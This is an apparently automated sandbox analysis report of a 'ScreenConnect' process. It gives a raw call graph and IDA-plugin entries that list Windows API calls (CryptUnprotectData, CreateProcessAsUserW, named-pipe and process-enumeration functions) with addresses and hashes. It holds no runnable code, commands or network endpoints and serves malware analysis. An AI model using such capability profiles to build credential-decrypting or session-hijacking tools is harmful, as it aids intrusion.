51761->51760 
51771 5bf07e0 51761->51771 51781 5bf07d0 51761->51781 51762 51b756f 51762->51707 51767 51b74ab 51765->51767 51766 51b74e7 51766->51707 51767->51766 51769 5bf07e0 3 API calls 51767->51769 51770 5bf07d0 3 API calls 51767->51770 51768 51b756f 51768->51707 51769->51768 51770->51768 51772 5bf0805 51771->51772 51774 5bf08b9 51771->51774 51772->51774 51775 5bf07e0 3 API calls 51772->51775 51776 5bf07d0 3 API calls 51772->51776 51791 5bf09c0 51772->51791 51773 5bf0a84 51773->51762 51779 5bf0b51 CryptUnprotectData 51774->51779 51797 5bf0aa0 51774->51797 51800 5bf0a99 51774->51800 51775->51774 51776->51774 51779->51773 51782 5bf07e0 51781->51782 51783 5bf08b9 51782->51783 51785 5bf07e0 3 API calls 51782->51785 51786 5bf07d0 3 API calls 51782->51786 51787 5bf09c0 3 API calls 51782->51787 51788 5bf0a99 CryptUnprotectData 51783->51788 51789 5bf0b51 CryptUnprotectData 51783->51789 51790 5bf0aa0 CryptUnprotectData 51783->51790 51784 5bf0a84 51784->51762 51785->51783 51786->51783 51787->51783 51788->51784 51789->51784 51790->51784 51792 5bf09d5 51791->51792 51794 5bf0a99 CryptUnprotectData 51792->51794 51795 5bf0b51 CryptUnprotectData 51792->51795 51796 5bf0aa0 CryptUnprotectData 51792->51796 51793 5bf0a84 51793->51774 51794->51793 51795->51793 51796->51793 51798 5bf0aee CryptUnprotectData 51797->51798 51799 5bf0b1a 51798->51799 51799->51773 51801 5bf0aee CryptUnprotectData 51800->51801 51802 5bf0b1a 51801->51802 51802->51773 51804 55b09d8 51803->51804 51805 55b0a65 51804->51805 51806 3fe66f0 2 API calls 51804->51806 51806->51805 51808 55b09d8 51807->51808 51809 55b0a65 51808->51809 51810 3fe66f0 2 API calls 51808->51810 51810->51809 51812 55b099a 51811->51812 51813 55b0a65 51812->51813 51814 3fe66f0 2 API calls 51812->51814 51814->51813 51817 51b647b 51815->51817 51816 51b64c3 51816->51672 51817->51816 51833 51b6b91 51817->51833 51839 51b6ba0 51817->51839 51822 55b099a 51820->51822 51821 55b0a65 51822->51821 51823 3fe66f0 2 API calls 51822->51823 51823->51821 51825 55b09d8 
51824->51825 51826 55b0a65 51825->51826 51827 3fe66f0 2 API calls 51825->51827 51827->51826 51829 51b6468 51828->51829 51830 51b64c3 51829->51830 51831 51b6b91 5 API calls 51829->51831 51832 51b6ba0 5 API calls 51829->51832 51830->51672 51831->51829 51832->51829 51834 51b6b9a 51833->51834 51836 51b6c04 51833->51836 51835 51b6bab 51834->51835 51843 51b7ca9 51834->51843 51852 51b7cb8 51834->51852 51835->51817 51836->51817 51840 51b7ca9 5 API calls 51839->51840 51841 51b6bab 51839->51841 51842 51b7cb8 5 API calls 51839->51842 51840->51841 51841->51817 51842->51841 51844 51b7c3b 51843->51844 51845 51b7cb2 51843->51845 51844->51835 51846 51b84a6 51845->51846 51847 51b7cf9 51845->51847 51860 51bac2a 51845->51860 51869 51ba9c6 51845->51869 51846->51847 51850 51bac2a 5 API calls 51846->51850 51851 51ba9c6 5 API calls 51846->51851 51847->51835 51850->51847 51851->51847 51854 51b7cf5 51852->51854 51853 51b84a6 51855 51b7cf9 51853->51855 51858 51bac2a 5 API calls 51853->51858 51859 51ba9c6 5 API calls 51853->51859 51854->51853 51854->51855 51856 51bac2a 5 API calls 51854->51856 51857 51ba9c6 5 API calls 51854->51857 51855->51835 51856->51853 51857->51853 51858->51855 51859->51855 51862 51baa99 51860->51862 51861 51bac59 51861->51846 51862->51861 51878 51bdbbf 51862->51878 51885 51be9e7 51862->51885 51890 51be0c0 51862->51890 51897 51be9de 51862->51897 51902 51be34f 51862->51902 51907 51be0af 51862->51907 51870 51ba9d0 51869->51870 51871 51bac59 51870->51871 51872 51bdbbf 5 API calls 51870->51872 51873 51be0af 5 API calls 51870->51873 51874 51be34f CreateFileA 51870->51874 51875 51be9de CreateFileA 51870->51875 51876 51be0c0 5 API calls 51870->51876 51877 51be9e7 CreateFileA 51870->51877 51871->51846 51872->51870 51873->51870 51874->51870 51875->51870 51876->51870 51877->51870 51879 51be0e0 51878->51879 51915 51bec41 51879->51915 51880 51beace 51880->51880 51881 51be147 51921 55b5ba0 51881->51921 51927 55b5b8f 51881->51927 51886 51be9f2 51885->51886 51888 55b5b8f CreateFileA 
51886->51888 51889 55b5ba0 CreateFileA 51886->51889 51887 51beace 51887->51887 51888->51887 51889->51887 51891 51be0f1 51890->51891 51894 51bec41 4 API calls 51891->51894 51892 51beace 51892->51892 51893 51be147 51895 55b5b8f CreateFileA 51893->51895 51896 55b5ba0 CreateFileA 51893->51896 51894->51893 51895->51892 51896->51892 51898 51bea41 51897->51898 51900 55b5b8f CreateFileA 51898->51900 51901 55b5ba0 CreateFileA 51898->51901 51899 51beace 51899->51899 51900->51899 51901->51899 51903 51be35b 51902->51903 51905 55b5b8f CreateFileA 51903->51905 51906 55b5ba0 CreateFileA 51903->51906 51904 51beace 51904->51904 51905->51904 51906->51904 51908 51be0a9 51907->51908 51909 51be0ba 51907->51909 51908->51862 51912 51bec41 4 API calls 51909->51912 51910 51beace 51910->51910 51911 51be147 51913 55b5b8f CreateFileA 51911->51913 51914 55b5ba0 CreateFileA 51911->51914 51912->51911 51913->51910 51914->51910 51916 51bec74 51915->51916 51918 51becbc 51916->51918 51933 5bf5ef8 51916->51933 51941 5bf5f08 51916->51941 51917 51bed4c 51918->51881 51922 55b5bbe 51921->51922 51924 55b5bd7 51922->51924 51980 55b5cf1 51922->51980 51924->51880 51926 55b5cf1 CreateFileA 51926->51924 51928 55b5ba0 51927->51928 51930 55b5bd7 51928->51930 51931 55b5cf1 CreateFileA 51928->51931 51929 55b5c00 51932 55b5cf1 CreateFileA 51929->51932 51930->51880 51931->51929 51932->51930 51935 5bf5f3c 51933->51935 51936 5bf5f2c 51933->51936 51934 5bf5f35 51934->51917 51949 5bf6088 51935->51949 51956 5bf6078 51935->51956 51936->51934 51937 5bf6088 4 API calls 51936->51937 51938 5bf6078 4 API calls 51936->51938 51937->51936 51938->51936 51942 5bf5f2c 51941->51942 51943 5bf5f3c 51941->51943 51944 5bf5f35 51942->51944 51945 5bf6088 4 API calls 51942->51945 51946 5bf6078 4 API calls 51942->51946 51947 5bf6088 4 API calls 51943->51947 51948 5bf6078 4 API calls 51943->51948 51944->51917 51945->51942 51946->51942 51947->51942 51948->51942 51950 5bf60ad 51949->51950 51952 5bf60bd 51949->51952 51951 5bf60b6 51950->51951 
51977 5bf4d60 51950->51977 51951->51936 51963 5bf6208 51952->51963 51970 5bf61f7 51952->51970 51957 5bf60ad 51956->51957 51959 5bf60bd 51956->51959 51958 5bf60b6 51957->51958 51960 5bf4d60 ProcessIdToSessionId 51957->51960 51958->51936 51961 5bf6208 2 API calls 51959->51961 51962 5bf61f7 2 API calls 51959->51962 51960->51957 51961->51957 51962->51957 51968 5bf6232 51963->51968 51969 5bf621f 51963->51969 51964 5bf6228 51964->51950 51965 5bf639a K32EnumProcesses 51966 5bf63d2 51965->51966 51966->51950 51967 5bf4d6c K32EnumProcesses 51967->51968 51968->51967 51968->51969 51969->51964 51969->51965 51975 5bf6232 51970->51975 51976 5bf621f 51970->51976 51971 5bf6228 51971->51950 51972 5bf639a K32EnumProcesses 51973 5bf63d2 51972->51973 51973->51950 51974 5bf4d6c K32EnumProcesses 51974->51975 51975->51974 51975->51976 51976->51971 51976->51972 51978 5bf6440 ProcessIdToSessionId 51977->51978 51979 5bf64b3 51978->51979 51979->51950 51981 55b5d0d 51980->51981 51985 5bf3381 51981->51985 51989 5bf3388 51981->51989 51986 5bf339b 51985->51986 51993 5bf245c 51986->51993 51990 5bf339b 51989->51990 51991 5bf245c CreateFileA 51990->51991 51992 55b5c00 51991->51992 51992->51926 51994 5bf33d8 CreateFileA 51993->51994 51996 5bf350d 51994->51996 51579 55b03d0 51580 55b0423 CreateProcessAsUserW 51579->51580 51582 55b04b4 51580->51582 51583 13b36b0 51584 13b36c6 51583->51584 51585 13b3764 51584->51585 51588 13be5e0 51584->51588 51586 13b3739 51589 13be614 51588->51589 51590 13be62e 51588->51590 51589->51590 51593 13bea99 51589->51593 51597 13beaa8 51589->51597 51590->51586 51595 13beace 51593->51595 51594 13beb06 51594->51590 51595->51594 51601 13beb50 51595->51601 51599 13beace 51597->51599 51598 13beb06 51598->51590 51599->51598 51600 13beb50 2 API calls 51599->51600 51600->51598 51602 13beb8e 51601->51602 51608 13bf788 51602->51608 51603 13bee2f 51604 13bedb7 51604->51603 51612 3fe09e1 51604->51612 51616 3fe0a08 51604->51616 51609 13bf7ac 51608->51609 51610 13bf7b3 51608->51610 
51609->51610 51611 13bf930 2 API calls 51609->51611 51610->51604 51611->51610 51613 3fe0a03 51612->51613 51614 3fe0510 2 API calls 51613->51614 51615 3fe0a45 51614->51615 51615->51604 51617 3fe0a2d 51616->51617 51618 3fe0510 2 API calls 51617->51618 51619 3fe0a45 51618->51619 51619->51604

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 435 55b1868-55b18ee 444 55b18f9-55b1905 435->444 445 55b18f0-55b18f2 435->445 447 55b1910-55b1912 444->447 448 55b1907-55b190e 444->448 445->444 450 55b1920-55b1948 447->450 448->447 449 55b1914-55b191b 448->449 451 55b197a-55b19d2 449->451 452 55b191d 449->452 455 55b194a-55b194f 450->455 456 55b1951 450->456 457 55b19da-55b1a3f CreateNamedPipeW 451->457 458 55b19d4-55b19d7 451->458 452->450 459 55b1956-55b196a 455->459 456->459 462 55b1a48-55b1a69 457->462 463 55b1a41-55b1a47 457->463 458->457 466 55b196b call 55b1868 459->466 467 55b196b call 55b1857 459->467 460 55b1970-55b1977 463->462 466->460 467->460
                                                                APIs
                                                                • CreateNamedPipeW.KERNEL32(00000000,?,?,?,?,?,00000001,00000004), ref: 055B1A2C
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3416786491.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_55b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateNamedPipe
                                                                • String ID:
                                                                • API String ID: 2489174969-0

                                                                APIs
                                                                • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 055B049F
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3416786491.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_55b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateProcessUser
                                                                • String ID:
                                                                • API String ID: 2217836671-0

                                                                APIs
                                                                • CryptUnprotectData.CRYPT32(?,?,00000000,?,?,?,?), ref: 05BF0B05
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CryptDataUnprotect
                                                                • String ID:
                                                                • API String ID: 834300711-0

                                                                APIs
                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05BF649E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ProcessSession
                                                                • String ID: :m
                                                                • API String ID: 3779259828-1467208035


                                                                Control-flow Graph (graph not reproduced; API call in graph: K32EnumProcesses)
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 61bcdbb15fa02f89b84f8a12ab8abe78b15b300168e538c2b2274b3a3a73b598
                                                                • Instruction ID: 48d499be009d57d906cdbeb1f05698fa6e8fee6e2d3ecf50c8190d7b21dcf781
                                                                • Opcode Fuzzy Hash: 61bcdbb15fa02f89b84f8a12ab8abe78b15b300168e538c2b2274b3a3a73b598
                                                                • Instruction Fuzzy Hash: 4A516D71A007058FCB24CFA9D884AAEBBF5FF88310F14896ED55AD7750D734A949CBA0

                                                                Control-flow Graph (graph not reproduced; API call in graph: CreateFileA)
                                                                APIs
                                                                • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05BF34F5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: c8cce09fea5aa3d1682ef693c583465c311169ff49bcdddb4045dae03f83b6fa
                                                                • Instruction ID: df370aa1aa0abedcd8149075d913083903a78d4e4169d51d8147a0f853c4f836
                                                                • Opcode Fuzzy Hash: c8cce09fea5aa3d1682ef693c583465c311169ff49bcdddb4045dae03f83b6fa
                                                                • Instruction Fuzzy Hash: D95158B0D00359DFDB10CFA9C844B9EBBF2FB48704F148469E908AB351D7B9A849CB91

                                                                Control-flow Graph (graph not reproduced; API call in graph: CreateFileA)
                                                                APIs
                                                                • CreateFileA.KERNEL32(?,80000000,?,?,?,00000001,00000004), ref: 05BF34F5
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID:
                                                                • API String ID: 823142352-0
                                                                • Opcode ID: 563a2dfe19a5ccfee821663cca44448b6a6ace1befe5e2caac97e79ae8ccbf2c
                                                                • Instruction ID: 1ea061163aa89bcff617d536741f7d7d3670fcf4a1830c682c167259f4a5763f
                                                                • Opcode Fuzzy Hash: 563a2dfe19a5ccfee821663cca44448b6a6ace1befe5e2caac97e79ae8ccbf2c
                                                                • Instruction Fuzzy Hash: 525166B1D003589FDB10CFA9C884B9EBBF2FB48704F148469E908AB351D779A849CF91

                                                                Control-flow Graph (graph not reproduced; API call in graph: CreateProcessAsUserW)
                                                                APIs
                                                                • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,?,?,?,?,?,00000000,?,?), ref: 055B049F
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3416786491.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_55b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: CreateProcessUser
                                                                • String ID:
                                                                • API String ID: 2217836671-0
                                                                • Opcode ID: 7d839e9529373772765f748bb4c44fb537697fa7d86eece0e66a25c80425b15d
                                                                • Instruction ID: f5ef78d8edfd86bbbe2b462a3afeee714f47aa1f3edd9bd9bf035fd638129c3b
                                                                • Opcode Fuzzy Hash: 7d839e9529373772765f748bb4c44fb537697fa7d86eece0e66a25c80425b15d
                                                                • Instruction Fuzzy Hash: 24410272900309DFDB10CFA9C888ADEBBF5FF48310F15842AE918A7260D779A955CB90

                                                                Control-flow Graph (graph not reproduced; API call in graph: ConnectNamedPipe)
                                                                APIs
                                                                • ConnectNamedPipe.KERNEL32(00000000), ref: 055B4250
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3416786491.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_55b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ConnectNamedPipe
                                                                • String ID:
                                                                • API String ID: 2191148154-0
                                                                • Opcode ID: 196fc2b8182f9fc42b9a1b6187889e170229dcdc73cfc8eb96f01221a793ee98
                                                                • Instruction ID: a7c67c5b984f0109b59856f61939ac288efaecb498b9ce30870262e62a909055
                                                                • Opcode Fuzzy Hash: 196fc2b8182f9fc42b9a1b6187889e170229dcdc73cfc8eb96f01221a793ee98
                                                                • Instruction Fuzzy Hash: 972102B1D00259DBDB24CF99D585BDDBBF1BF48610F14806AE919AB350CB789845CFA0

                                                                Control-flow Graph (graph not reproduced; API call in graph: ProcessIdToSessionId)
                                                                APIs
                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05BF649E
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ProcessSession
                                                                • String ID:
                                                                • API String ID: 3779259828-0
                                                                • Opcode ID: 5d80e9524d0e51ac1185780fb09443370f09490197b7310872e985527e50c9ca
                                                                • Instruction ID: ba49d39b5a1dc970d72cb2fd67a748fd50adfd782fc0b1150807e18dc514b3c3
                                                                • Opcode Fuzzy Hash: 5d80e9524d0e51ac1185780fb09443370f09490197b7310872e985527e50c9ca
                                                                • Instruction Fuzzy Hash: 5C2145B2C042498FCB10CF9AC8447DEBBF4EB48324F15805AD858A7251D378A549CFA1
                                                                APIs
                                                                • ConnectNamedPipe.KERNEL32(00000000), ref: 055B4250
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3416786491.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_55b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ConnectNamedPipe
                                                                • String ID:
                                                                • API String ID: 2191148154-0
                                                                • Opcode ID: 2e19075c8ffcf2bfac8d2b9b95e93ba22379974c94d2a34f146ee67ac389042a
                                                                • Instruction ID: 8204fb8b0a2d783c7eb867b3b48f6ee75d268b2878768662274e561914e77659
                                                                • Opcode Fuzzy Hash: 2e19075c8ffcf2bfac8d2b9b95e93ba22379974c94d2a34f146ee67ac389042a
                                                                • Instruction Fuzzy Hash: 1121E0B0D04259DFDB24CFAAC488B9EBBF5BF48600F148069E919A7351CB749805CFA0
                                                                APIs
                                                                • K32EnumProcesses.KERNEL32(00000000,00000000,?), ref: 05BF63BD
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: EnumProcesses
                                                                • String ID:
                                                                • API String ID: 84517404-0
                                                                • Opcode ID: 5912be2cfcaedc35cf304f7d637d7a4df5131901c36e4c20f63188da5a4d8246
                                                                • Instruction ID: 9a2af89045d54dbc0e4c8a0f5e83ac58a83beedecd5f8a82d62d1d437b1422d9
                                                                • Opcode Fuzzy Hash: 5912be2cfcaedc35cf304f7d637d7a4df5131901c36e4c20f63188da5a4d8246
                                                                • Instruction Fuzzy Hash: 2B2116B19042099FDB10CF9AD885A9EFBF4FB48310F10846ED919A7340C378A905CBA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: d
                                                                • API String ID: 0-2564639436
                                                                • Opcode ID: db6db2c864572e594cc9980998dc1ec4da15d5fa4697940a687846415e830b59
                                                                • Instruction ID: 215998c25d7d7759c6b180f6f92d8df04f277c590f518a9b771bd17d1763526f
                                                                • Opcode Fuzzy Hash: db6db2c864572e594cc9980998dc1ec4da15d5fa4697940a687846415e830b59
                                                                • Instruction Fuzzy Hash: DFD18375A40716CFCB04DF68D894A9AB7B1FF89310B148699E909AB365DB30FC95CF80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: d
                                                                • API String ID: 0-2564639436
                                                                • Opcode ID: 3cfe3b79bfa9b2e24ec5b59269cf12d94a9fca95b48c20527f1ebbdcfe3f8740
                                                                • Instruction ID: 52c8387a810d1f521b53d9afbe9b0aa6430a0673c832b508c63ab940f5a7bb09
                                                                • Opcode Fuzzy Hash: 3cfe3b79bfa9b2e24ec5b59269cf12d94a9fca95b48c20527f1ebbdcfe3f8740
                                                                • Instruction Fuzzy Hash: 07C14735600602DFD714DF18C494DAABBF2FF88310B2ACA69E55A9B665D770FC46CB80
                                                                APIs
                                                                • WaitNamedPipeW.KERNEL32(00000000), ref: 055B5DCF
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3416786491.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_55b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: NamedPipeWait
                                                                • String ID:
                                                                • API String ID: 3146367894-0
                                                                • Opcode ID: d095941d4031c0f43a871ec3b255364fdac0d2b39ed5eeb43088e099090accba
                                                                • Instruction ID: 6b1170cf60ea5b4c26392b84b15ac52233c888b99f0a7c7e58df3bb8b985eed0
                                                                • Opcode Fuzzy Hash: d095941d4031c0f43a871ec3b255364fdac0d2b39ed5eeb43088e099090accba
                                                                • Instruction Fuzzy Hash: 8E2133B6C00209CFDB14CF9AC548BEEBBB4BF48320F11842ED919A7240D379A545CFA1
                                                                APIs
                                                                • WaitNamedPipeW.KERNEL32(00000000), ref: 055B5DCF
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3416786491.00000000055B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 055B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_55b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: NamedPipeWait
                                                                • String ID:
                                                                • API String ID: 3146367894-0
                                                                • Opcode ID: 0bb6a9ccfbdb8b3347c4956110dede1589eb6408497ad7e9fcfc4cb60ae28686
                                                                • Instruction ID: 85ac50c27f30f3594e19e007d4a9ed8cac7ee1d6a491dfd74cfc9c813ce145ba
                                                                • Opcode Fuzzy Hash: 0bb6a9ccfbdb8b3347c4956110dede1589eb6408497ad7e9fcfc4cb60ae28686
                                                                • Instruction Fuzzy Hash: 1F21F4B68003498FDB14CF9AC448AEEBBF4FB48310F15842DD559A7240D779A545CFA1
                                                                APIs
                                                                • ProcessIdToSessionId.KERNEL32(00000000,?), ref: 05BF649E
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3419098403.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_5bf0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID: ProcessSession
                                                                • String ID:
                                                                • API String ID: 3779259828-0
                                                                • Opcode ID: 087c37893f3123e2e55de5028c53cfdff5392e9558ea5fb039be4f0cbaed55da
                                                                • Instruction ID: ad1d712c1b76891fa32fa2e9435ff11b66b689b987c742890930438f57cf58ba
                                                                • Opcode Fuzzy Hash: 087c37893f3123e2e55de5028c53cfdff5392e9558ea5fb039be4f0cbaed55da
                                                                • Instruction Fuzzy Hash: 1E1103B1C046499FDB10DF9AC4447AEFBF4EB88324F10846AD959A7240D378A549CFA5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: [!
                                                                • API String ID: 0-4044816477
                                                                • Opcode ID: a60578a60f552954799ef8ef01c62145fc4dd9607902b5e67bed6319d0030395
                                                                • Instruction ID: d8a57364779a5d7b2c4455fc2edf32a899beef59776fa9601f110491ef5e83c4
                                                                • Opcode Fuzzy Hash: a60578a60f552954799ef8ef01c62145fc4dd9607902b5e67bed6319d0030395
                                                                • Instruction Fuzzy Hash: 0AB15D30A102169FDB19DF68E490A9EB7F2EF85354B14C56DD509AB364EF31EC06CB80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,
                                                                • API String ID: 0-3772416878
                                                                • Opcode ID: 673ad56431dbedb2cc6039674845c393858c7857bad94fd3bb673dad379e66e8
                                                                • Instruction ID: dfc308ddb65d062cd4933bafd81f1ce87d86ad819801967dffa8cb77a43efcca
                                                                • Opcode Fuzzy Hash: 673ad56431dbedb2cc6039674845c393858c7857bad94fd3bb673dad379e66e8
                                                                • Instruction Fuzzy Hash: DF618B75B002149FDB18EB79D854AAEBBF6FF89210B14856DD506EB380DF35AC428B90
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,
                                                                • API String ID: 0-3772416878
                                                                • Opcode ID: 1c7007eab10c8f8bd9b9c64cf67536c6f659cd90b1eb997e1a211f5de44ecd31
                                                                • Instruction ID: 96268ebe0a9f381e37c54c2681b0ae9178400248613af6069871b9d3529b5854
                                                                • Opcode Fuzzy Hash: 1c7007eab10c8f8bd9b9c64cf67536c6f659cd90b1eb997e1a211f5de44ecd31
                                                                • Instruction Fuzzy Hash: B251A135B002148FDB18DB78D894AAEBBF6FF89310B558569E506EB340DF75AC42CB80
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ,
                                                                • API String ID: 0-3772416878
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 405fc03eb4d213a38bc335df37bb2009f214e3575cdd882ac0883f787400068d
                                                                • Instruction ID: e0bd20a21b2fa8ca98382147d724e50f9d2ff848dd2e8f19a66d2246c86fa44f
                                                                • Opcode Fuzzy Hash: 405fc03eb4d213a38bc335df37bb2009f214e3575cdd882ac0883f787400068d
                                                                • Instruction Fuzzy Hash: F6512C30600B05CFE734DF29E454696BBF6EF94310B008B2DE19687694EB74E949CF91
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3410680860.0000000003FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03FE0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_3fe0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7e1029c3e75b54e6ecff5ff9dea90e0127bb381fea7134d2708c9e11790eb210
                                                                • Instruction ID: ca3b68210e38d60632c7b8d44fa99056fe96e918e4514e0035cc237f23dc7e62
                                                                • Opcode Fuzzy Hash: 7e1029c3e75b54e6ecff5ff9dea90e0127bb381fea7134d2708c9e11790eb210
                                                                • Instruction Fuzzy Hash: B951F930700606CFCB24DF7AD894A5AB7F6FF89310B148A6DE596DB764E730E8058B94
                                                                Memory Dump Source
                                                                • Source File: 00000008.00000002.3415456282.00000000051B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 051B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_8_2_51b0000_ScreenConnect.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 953ca7974f15fcf6eed61a7ad6d7079687652f781200af4dfa282df3fde733fe
                                                                • Instruction ID: de5641f1d72bcbd319bccd227fac3df3aa7866dcbaea92962bb8cb08747f1632
